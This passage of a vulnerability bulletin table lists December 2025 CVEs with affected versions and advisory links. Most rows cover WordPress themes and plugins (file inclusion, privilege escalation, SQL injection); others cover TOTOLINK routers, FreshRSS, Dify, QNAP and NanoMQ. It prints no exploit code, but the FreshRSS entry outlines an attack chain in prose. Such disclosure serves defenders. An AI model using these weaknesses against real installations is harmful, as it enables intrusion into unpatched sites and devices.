| WPXPO--PostX | Missing Authorization vulnerability in WPXPO PostX ultimate-post allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PostX: from n/a through <= 4.1.36. | 2025-12-18 | not yet calculated | CVE-2025-54751 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-4-1-36-broken-access-control-vulnerability?_s_id=cve |
| WPXPO--PostX | Incorrect Privilege Assignment vulnerability in WPXPO PostX ultimate-post allows Privilege Escalation. This issue affects PostX: from n/a through <= 4.1.35. | 2025-12-18 | not yet calculated | CVE-2025-55707 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-4-1-35-privilege-escalation-vulnerability?_s_id=cve |
| TOTOLINK--TOTOLINK | TOTOLINK N200RE V9.3.5u.6437_B20230519 is vulnerable to command injection in setOpModeCfg via hostName. | 2025-12-15 | not yet calculated | CVE-2025-55893 | https://www.totolink.net/ https://github.com/l0tk3/CVES/blob/main/CVE-2025-55893.pdf |
| TOTOLINK--TOTOLINK | TOTOLINK A3300R V17.0.0cu.557_B20221024 and N200RE V9.3.5u.6448_B20240521 and V9.3.5u.6437_B20230519 are vulnerable to Incorrect Access Control. Attackers can send payloads to the interface without logging in (remote). | 2025-12-15 | not yet calculated | CVE-2025-55895 | https://www.totolink.net/ https://github.com/l0tk3/CVES/blob/main/CVE-2025-55895.pdf |
| TOTOLINK--TOTOLINK | TOTOLINK A3300R V17.0.0cu.596_B20250515 is vulnerable to command injection in the function NTPSyncWithHost via the host_time parameter. | 2025-12-15 | not yet calculated | CVE-2025-55901 | https://www.totolink.net https://github.com/l0tk3/CVES/blob/main/CVE-2025-55901.pdf |
| Dify--Dify | Default credentials in Dify through 1.5.1: the PostgreSQL username and password are specified in the docker-compose.yaml file included in its source code. | 2025-12-18 | not yet calculated | CVE-2025-56157 | http://dify.com https://github.com/langgenius/dify https://gist.github.com/Cristliu/216ddbadaf3258498c93d408683ecabd |
| venusweb--Logtik | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in venusweb Logtik logtik allows Reflected XSS. This issue affects Logtik: from n/a through <= 2.3. | 2025-12-18 | not yet calculated | CVE-2025-57897 | https://vdp.patchstack.com/database/Wordpress/Theme/logtik/vulnerability/wordpress-logtik-theme-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| galette--galette | Galette is a membership management web application for non-profit organizations. Starting in version 0.9.6 and prior to version 1.2.0, attackers with the group manager role can bypass intended restrictions, allowing unauthorized access and changes despite role-based controls. Since it requires privileged access initially, exploitation is restricted to malicious insiders or compromised group manager accounts. Version 1.2.0 fixes the issue. | 2025-12-19 | not yet calculated | CVE-2025-58052 | https://github.com/galette/galette/security/advisories/GHSA-gp9g-gf56-fcxx |
| galette--galette | Galette is a membership management web application for non-profit organizations. Prior to version 1.2.0, while updating any existing account with a self-forged POST request, one can gain higher privileges. Version 1.2.0 fixes the issue. | 2025-12-19 | not yet calculated | CVE-2025-58053 | https://github.com/galette/galette/security/advisories/GHSA-r7x8-6r56-498r |
| FreshRSS--FreshRSS | FreshRSS is a self-hosted RSS feed aggregator. In versions 1.23.0 through 1.27.0, using a path traversal inside the `language` user configuration parameter, it's possible to call `install.php` and perform various administrative actions as an unprivileged user. These actions include logging in as the admin, creating a new admin user, or setting the database to an attacker-controlled MySQL server and abusing it to execute code in FreshRSS by setting malicious feed `curl_params` inside the `feed` table. Version 1.27.1 fixes the issue. | 2025-12-15 | not yet calculated | CVE-2025-58173 | https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-6c8h-w3j5-j293 https://github.com/FreshRSS/FreshRSS/pull/7878 https://github.com/FreshRSS/FreshRSS/pull/7971 https://github.com/FreshRSS/FreshRSS/pull/7979 https://github.com/FreshRSS/FreshRSS/commit/79604aa4b3051f083d1734bd9e82c6a89d785c5a#diff-49280171b6e7964e21a0270427e56eacb47b8ac562593a01ad4bc74b49f840c7R135 https://github.com/FreshRSS/FreshRSS/commit/dbbae15a8458679db0f4540dacdbdcff9c02ec8c#diff-63f610c36d0f2555c1787f6d0804f46f4df6e0f918dfe03408309039abf6efebL85-L88 https://github.com/FreshRSS/FreshRSS/commit/ee175dd6169a016fc898fac62d046e22c205dec0#diff-6ebff7743ede829cf5a7f0e4566b42023a2d4779cc8d7e96fefec116f2292174R190-R194 |
| axiomthemes--Paragon | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Paragon paragon allows PHP Local File Inclusion. This issue affects Paragon: from n/a through <= 1.1. | 2025-12-18 | not yet calculated | CVE-2025-58225 | https://vdp.patchstack.com/database/Wordpress/Theme/paragon/vulnerability/wordpress-paragon-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Woo Hoo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Woo Hoo woohoo allows PHP Local File Inclusion. This issue affects Woo Hoo: from n/a through <= 1.25. | 2025-12-18 | not yet calculated | CVE-2025-58706 | https://vdp.patchstack.com/database/Wordpress/Theme/woohoo/vulnerability/wordpress-woo-hoo-theme-1-25-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--777 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes 777 triple-seven allows PHP Local File Inclusion. This issue affects 777: from n/a through <= 1.3. | 2025-12-18 | not yet calculated | CVE-2025-58708 | https://vdp.patchstack.com/database/Wordpress/Theme/triple-seven/vulnerability/wordpress-777-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Legacy | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Legacy legacy allows PHP Local File Inclusion. This issue affects Legacy: from n/a through <= 1.9. | 2025-12-18 | not yet calculated | CVE-2025-58709 | https://vdp.patchstack.com/database/Wordpress/Theme/legacy/vulnerability/wordpress-legacy-theme-1-9-local-file-inclusion-vulnerability?_s_id=cve |
| e-plugins--Hotel Listing | Incorrect Privilege Assignment vulnerability in e-plugins Hotel Listing hotel-listing allows Privilege Escalation. This issue affects Hotel Listing: from n/a through <= 1.4.0. | 2025-12-18 | not yet calculated | CVE-2025-58710 | https://vdp.patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-0-privilege-escalation-vulnerability?_s_id=cve |
| axiomthemes--Algenix | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Algenix algenix allows PHP Local File Inclusion. This issue affects Algenix: from n/a through <= 1.0. | 2025-12-18 | not yet calculated | CVE-2025-58803 | https://vdp.patchstack.com/database/Wordpress/Theme/algenix/vulnerability/wordpress-algenix-theme-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| javothemes--Javo Core | Missing Authorization vulnerability in javothemes Javo Core javo-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Javo Core: from n/a through <= 3.0.0.529. | 2025-12-18 | not yet calculated | CVE-2025-58877 | https://vdp.patchstack.com/database/Wordpress/Plugin/javo-core/vulnerability/wordpress-javo-core-plugin-3-0-0-529-arbitrary-content-deletion-vulnerability?_s_id=cve |
| AncoraThemes--Festy | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Festy festy allows PHP Local File Inclusion. This issue affects Festy: from n/a through <= 1.13.0. | 2025-12-18 | not yet calculated | CVE-2025-58879 | https://vdp.patchstack.com/database/Wordpress/Theme/festy/vulnerability/wordpress-festy-theme-1-13-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Pathfinder | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Pathfinder pathfinder allows PHP Local File Inclusion. This issue affects Pathfinder: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-58885 | https://vdp.patchstack.com/database/Wordpress/Theme/pathfinder/vulnerability/wordpress-pathfinder-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--The Flash | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes The Flash theflash allows PHP Local File Inclusion. This issue affects The Flash: from n/a through <= 1.15. | 2025-12-18 | not yet calculated | CVE-2025-58888 | https://vdp.patchstack.com/database/Wordpress/Theme/theflash/vulnerability/wordpress-the-flash-theme-1-15-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Towny | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Towny towny allows PHP Local File Inclusion. This issue affects Towny: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-58889 | https://vdp.patchstack.com/database/Wordpress/Theme/towny/vulnerability/wordpress-towny-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Playful | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Playful playful allows PHP Local File Inclusion.This issue affects Playful: from n/a through <= 1.19.0. | 2025-12-18 | not yet calculated | CVE-2025-58890 | https://vdp.patchstack.com/database/Wordpress/Theme/playful/vulnerability/wordpress-playful-theme-1-19-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Sanger | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Sanger sanger allows PHP Local File Inclusion.This issue affects Sanger: from n/a through <= 1.24.0. | 2025-12-18 | not yet calculated | CVE-2025-58891 | https://vdp.patchstack.com/database/Wordpress/Theme/sanger/vulnerability/wordpress-sanger-theme-1-24-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Tourimo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Tourimo tourimo allows PHP Local File Inclusion.This issue affects Tourimo: from n/a through <= 1.2.3. | 2025-12-18 | not yet calculated | CVE-2025-58892 | https://vdp.patchstack.com/database/Wordpress/Theme/tourimo/vulnerability/wordpress-tourimo-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Alright | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Alright alright allows PHP Local File Inclusion.This issue affects Alright: from n/a through <= 1.6.1. | 2025-12-18 | not yet calculated | CVE-2025-58893 | https://vdp.patchstack.com/database/Wordpress/Theme/alright/vulnerability/wordpress-alright-theme-1-6-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Good Mood | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Good Mood good-mood allows PHP Local File Inclusion.This issue affects Good Mood: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-58894 | https://vdp.patchstack.com/database/Wordpress/Theme/good-mood/vulnerability/wordpress-good-mood-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Integro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Integro integro allows PHP Local File Inclusion.This issue affects Integro: from n/a through <= 1.8.0. | 2025-12-18 | not yet calculated | CVE-2025-58895 | https://vdp.patchstack.com/database/Wordpress/Theme/integro/vulnerability/wordpress-integro-theme-1-8-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Otaku | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Otaku otaku allows PHP Local File Inclusion.This issue affects Otaku: from n/a through <= 1.8.0. | 2025-12-18 | not yet calculated | CVE-2025-58896 | https://vdp.patchstack.com/database/Wordpress/Theme/otaku/vulnerability/wordpress-otaku-theme-1-8-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--HealthHub | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes HealthHub healthhub allows PHP Local File Inclusion.This issue affects HealthHub: from n/a through <= 1.3.0. | 2025-12-18 | not yet calculated | CVE-2025-58898 | https://vdp.patchstack.com/database/Wordpress/Theme/healthhub/vulnerability/wordpress-healthhub-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Frame | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Frame frame allows PHP Local File Inclusion.This issue affects Frame: from n/a through <= 2.4.0. | 2025-12-18 | not yet calculated | CVE-2025-58899 | https://vdp.patchstack.com/database/Wordpress/Theme/frame/vulnerability/wordpress-frame-theme-2-4-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--UniTravel | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes UniTravel unitravel allows PHP Local File Inclusion.This issue affects UniTravel: from n/a through <= 1.4.2. | 2025-12-18 | not yet calculated | CVE-2025-58900 | https://vdp.patchstack.com/database/Wordpress/Theme/unitravel/vulnerability/wordpress-unitravel-theme-1-4-2-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Takeout | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Takeout takeout allows PHP Local File Inclusion.This issue affects Takeout: from n/a through <= 1.3.0. | 2025-12-18 | not yet calculated | CVE-2025-58901 | https://vdp.patchstack.com/database/Wordpress/Theme/takeout/vulnerability/wordpress-takeout-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Critique | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Critique critique allows PHP Local File Inclusion.This issue affects Critique: from n/a through <= 1.17. | 2025-12-18 | not yet calculated | CVE-2025-58923 | https://vdp.patchstack.com/database/Wordpress/Theme/critique/vulnerability/wordpress-critique-theme-1-17-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Neptunus | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Neptunus neptunus allows PHP Local File Inclusion.This issue affects Neptunus: from n/a through <= 1.0.11. | 2025-12-18 | not yet calculated | CVE-2025-58925 | https://vdp.patchstack.com/database/Wordpress/Theme/neptunus/vulnerability/wordpress-neptunus-theme-1-0-11-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Cerebrum | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Cerebrum cerebrum allows PHP Local File Inclusion.This issue affects Cerebrum: from n/a through <= 1.12. | 2025-12-18 | not yet calculated | CVE-2025-58926 | https://vdp.patchstack.com/database/Wordpress/Theme/cerebrum/vulnerability/wordpress-cerebrum-theme-1-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Stallion | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Stallion stallion allows PHP Local File Inclusion.This issue affects Stallion: from n/a through <= 1.17. | 2025-12-18 | not yet calculated | CVE-2025-58927 | https://vdp.patchstack.com/database/Wordpress/Theme/stallion/vulnerability/wordpress-stallion-theme-1-17-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Heart | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Heart heart allows PHP Local File Inclusion.This issue affects Heart: from n/a through <= 1.8. | 2025-12-18 | not yet calculated | CVE-2025-58928 | https://vdp.patchstack.com/database/Wordpress/Theme/heart/vulnerability/wordpress-heart-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Pantry | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Pantry pantry allows PHP Local File Inclusion.This issue affects Pantry: from n/a through <= 1.4. | 2025-12-18 | not yet calculated | CVE-2025-58929 | https://vdp.patchstack.com/database/Wordpress/Theme/pantry/vulnerability/wordpress-pantry-theme-1-4-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--FitFlex | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes FitFlex fitflex allows PHP Local File Inclusion.This issue affects FitFlex: from n/a through <= 1.6. | 2025-12-18 | not yet calculated | CVE-2025-58930 | https://vdp.patchstack.com/database/Wordpress/Theme/fitflex/vulnerability/wordpress-fitflex-theme-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Palatio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Palatio palatio allows PHP Local File Inclusion.This issue affects Palatio: from n/a through <= 1.6. | 2025-12-18 | not yet calculated | CVE-2025-58931 | https://vdp.patchstack.com/database/Wordpress/Theme/palatio/vulnerability/wordpress-palatio-theme-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Prisma | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Prisma prisma allows PHP Local File Inclusion.This issue affects Prisma: from n/a through <= 1.10. | 2025-12-18 | not yet calculated | CVE-2025-58932 | https://vdp.patchstack.com/database/Wordpress/Theme/prisma/vulnerability/wordpress-prisma-theme-1-10-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Anubis | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Anubis anubis allows PHP Local File Inclusion.This issue affects Anubis: from n/a through <= 1.25. | 2025-12-18 | not yet calculated | CVE-2025-58933 | https://vdp.patchstack.com/database/Wordpress/Theme/anubis/vulnerability/wordpress-anubis-theme-1-25-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--The Gig | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes The Gig thegig allows PHP Local File Inclusion.This issue affects The Gig: from n/a through <= 1.18.0. | 2025-12-18 | not yet calculated | CVE-2025-58934 | https://vdp.patchstack.com/database/Wordpress/Theme/thegig/vulnerability/wordpress-the-gig-theme-1-18-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Lunna | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Lunna lunna allows PHP Local File Inclusion.This issue affects Lunna: from n/a through <= 1.15. | 2025-12-18 | not yet calculated | CVE-2025-58935 | https://vdp.patchstack.com/database/Wordpress/Theme/lunna/vulnerability/wordpress-lunna-theme-1-15-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Catamaran | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Catamaran catamaran allows PHP Local File Inclusion.This issue affects Catamaran: from n/a through <= 1.15. | 2025-12-18 | not yet calculated | CVE-2025-58936 | https://vdp.patchstack.com/database/Wordpress/Theme/catamaran/vulnerability/wordpress-catamaran-theme-1-15-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Tacticool | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Tacticool tacticool allows PHP Local File Inclusion.This issue affects Tacticool: from n/a through <= 1.0.13. | 2025-12-18 | not yet calculated | CVE-2025-58937 | https://vdp.patchstack.com/database/Wordpress/Theme/tacticool/vulnerability/wordpress-tacticool-theme-1-0-13-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeAtelier--IDonatePro | Missing Authorization vulnerability in ThemeAtelier IDonatePro idonate-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects IDonatePro: from n/a through <= 2.1.9. | 2025-12-18 | not yet calculated | CVE-2025-58938 | https://vdp.patchstack.com/database/Wordpress/Plugin/idonate-pro/vulnerability/wordpress-idonatepro-plugin-2-1-9-broken-access-control-vulnerability-2?_s_id=cve |
| axiomthemes--Basil | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Basil basil allows PHP Local File Inclusion.This issue affects Basil: from n/a through <= 1.3.12. | 2025-12-18 | not yet calculated | CVE-2025-58940 | https://vdp.patchstack.com/database/Wordpress/Theme/basil/vulnerability/wordpress-basil-theme-1-3-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Fabric | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Fabric fabric allows PHP Local File Inclusion.This issue affects Fabric: from n/a through <= 1.5.0. | 2025-12-18 | not yet calculated | CVE-2025-58941 | https://vdp.patchstack.com/database/Wordpress/Theme/fabric/vulnerability/wordpress-fabric-theme-1-5-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Dwell | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Dwell dwell allows PHP Local File Inclusion.This issue affects Dwell: from n/a through <= 1.7.0. | 2025-12-18 | not yet calculated | CVE-2025-58942 | https://vdp.patchstack.com/database/Wordpress/Theme/dwell/vulnerability/wordpress-dwell-theme-1-7-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Agricola | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Agricola agricola allows PHP Local File Inclusion.This issue affects Agricola: from n/a through <= 1.1.0. | 2025-12-18 | not yet calculated | CVE-2025-58943 | https://vdp.patchstack.com/database/Wordpress/Theme/agricola/vulnerability/wordpress-agricola-theme-1-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Manufactory | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Manufactory manufactory allows PHP Local File Inclusion.This issue affects Manufactory: from n/a through <= 1.4. | 2025-12-18 | not yet calculated | CVE-2025-58944 | https://vdp.patchstack.com/database/Wordpress/Theme/manufactory/vulnerability/wordpress-manufactory-theme-1-4-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--EcoGrow | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes EcoGrow ecogrow allows PHP Local File Inclusion.This issue affects EcoGrow: from n/a through <= 1.7. | 2025-12-18 | not yet calculated | CVE-2025-58945 | https://vdp.patchstack.com/database/Wordpress/Theme/ecogrow/vulnerability/wordpress-ecogrow-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Vocal | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Vocal vocal allows PHP Local File Inclusion.This issue affects Vocal: from n/a through <= 1.12. | 2025-12-18 | not yet calculated | CVE-2025-58946 | https://vdp.patchstack.com/database/Wordpress/Theme/vocal/vulnerability/wordpress-vocal-theme-1-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Athos | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Athos athos allows PHP Local File Inclusion.This issue affects Athos: from n/a through <= 1.9. | 2025-12-18 | not yet calculated | CVE-2025-58947 | https://vdp.patchstack.com/database/Wordpress/Theme/athos/vulnerability/wordpress-athos-theme-1-9-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Aromatica | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Aromatica aromatica allows PHP Local File Inclusion.This issue affects Aromatica: from n/a through <= 1.8. | 2025-12-18 | not yet calculated | CVE-2025-58948 | https://vdp.patchstack.com/database/Wordpress/Theme/aromatica/vulnerability/wordpress-aromatica-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Spock | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Spock spock allows PHP Local File Inclusion.This issue affects Spock: from n/a through <= 1.17. | 2025-12-18 | not yet calculated | CVE-2025-58949 | https://vdp.patchstack.com/database/Wordpress/Theme/spock/vulnerability/wordpress-spock-theme-1-17-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Lione | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Lione lione allows PHP Local File Inclusion.This issue affects Lione: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-58950 | https://vdp.patchstack.com/database/Wordpress/Theme/lione/vulnerability/wordpress-lione-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| smartcms--Advance Seat Reservation Management for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in smartcms Advance Seat Reservation Management for WooCommerce scw-seat-reservation allows SQL Injection.This issue affects Advance Seat Reservation Management for WooCommerce: from n/a through <= 3.1. | 2025-12-18 | not yet calculated | CVE-2025-58951 | https://vdp.patchstack.com/database/Wordpress/Plugin/scw-seat-reservation/vulnerability/wordpress-advance-seat-reservation-management-for-woocommerce-plugin-3-1-sql-injection-vulnerability?_s_id=cve |
| loopus--WP Attractive Donations System - Easy Stripe & Paypal donations | Cross-Site Request Forgery (CSRF) vulnerability in loopus WP Attractive Donations System - Easy Stripe & Paypal donations WP_AttractiveDonationsSystem allows Cross Site Request Forgery.This issue affects WP Attractive Donations System - Easy Stripe & Paypal donations: from n/a through <= 1.25. | 2025-12-16 | not yet calculated | CVE-2025-58999 | https://vdp.patchstack.com/database/Wordpress/Plugin/WP_AttractiveDonationsSystem/vulnerability/wordpress-wp-attractive-donations-system-easy-stripe-paypal-donations-plugin-1-25-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ThemeNectar--Salient Core | Missing Authorization vulnerability in ThemeNectar Salient Core salient-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Salient Core: from n/a through <= 3.0.8. | 2025-12-16 | not yet calculated | CVE-2025-59001 | https://vdp.patchstack.com/database/Wordpress/Plugin/salient-core/vulnerability/wordpress-salient-core-plugin-3-0-8-broken-access-control-vulnerability?_s_id=cve |
| Astoundify--Listify | Cross-Site Request Forgery (CSRF) vulnerability in Astoundify Listify listify allows Cross Site Request Forgery.This issue affects Listify: from n/a through <= 3.2.5. | 2025-12-16 | not yet calculated | CVE-2025-59009 | https://vdp.patchstack.com/database/Wordpress/Theme/listify/vulnerability/wordpress-listify-theme-3-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Jthemes--Sale! Immigration law, Visa services support, Migration Agent Consulting | Incorrect Privilege Assignment vulnerability in Jthemes Sale! Immigration law, Visa services support, Migration Agent Consulting immiex allows Privilege Escalation.This issue affects Sale! Immigration law, Visa services support, Migration Agent Consulting: from n/a through <= 1.5.8. | 2025-12-18 | not yet calculated | CVE-2025-59134 | https://vdp.patchstack.com/database/Wordpress/Theme/immiex/vulnerability/wordpress-sale-immigration-law-visa-services-support-migration-agent-consulting-theme-1-5-8-privilege-escalation-vulnerability?_s_id=cve |
| ASUS--live update | Certain versions of the ASUS Live Update client were distributed with unauthorized modifications introduced through a supply chain compromise. The modified builds could cause devices meeting specific targeting conditions to perform unintended actions. Only devices that met these conditions and installed the compromised versions were affected. The Live Update client has already reached End-of-Support (EOS) in October 2021, and no currently supported devices or products are affected by this issue. | 2025-12-17 | not yet calculated | CVE-2025-59374 | https://www.asus.com/news/hqfgvuyz6uyayje1/ |
| QNAP Systems Inc.--QTS | An authentication bypass by spoofing vulnerability has been reported to affect several QNAP operating system versions. Remote attackers can exploit the vulnerability to access resources that are not otherwise accessible without proper authentication. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later; QuTS hero h5.2.7.3297 build 20251024 and later; QuTS hero h5.3.1.3292 build 20251024 and later. | 2025-12-16 | not yet calculated | CVE-2025-59385 | https://www.qnap.com/en/security-advisory/qsa-25-45 |
| Inaba Denki Sangyo Co., Ltd.--CHOCO TEI WATCHER mini (IB-MCT001) | CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper restriction of rendered UI layers or frames. If a user clicks on content on a malicious web page while logged into the product, unintended operations may be performed on the product. | 2025-12-16 | not yet calculated | CVE-2025-59479 | https://www.inaba.co.jp/files/chocomini_vulnerability_newly_identified.pdf https://jvn.jp/en/vu/JVNVU92827367/ |
| nanomq--nanomq | NanoMQ is a messaging broker/bus for IoT Edge & SDV. Versions prior to 0.24.4 contain a buffer overflow that is triggered when a PUBLISH packet matches both a shared subscription and a vanilla (non-shared) subscription. This is fixed in version 0.24.4. As a workaround, disable shared subscription. | 2025-12-15 | not yet calculated | CVE-2025-59947 | https://github.com/nanomq/nanomq/security/advisories/GHSA-98f4-cmg8-x7f3 https://github.com/nanomq/nanomq/issues/2110 https://github.com/nanomq/nanomq/commit/5f5581054bb92f102cf99251e8af2f43763d457b |
| AncoraThemes--Chinchilla | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Chinchilla chinchilla allows PHP Local File Inclusion. This issue affects Chinchilla: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-60042 | https://vdp.patchstack.com/database/Wordpress/Theme/chinchilla/vulnerability/wordpress-chinchilla-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
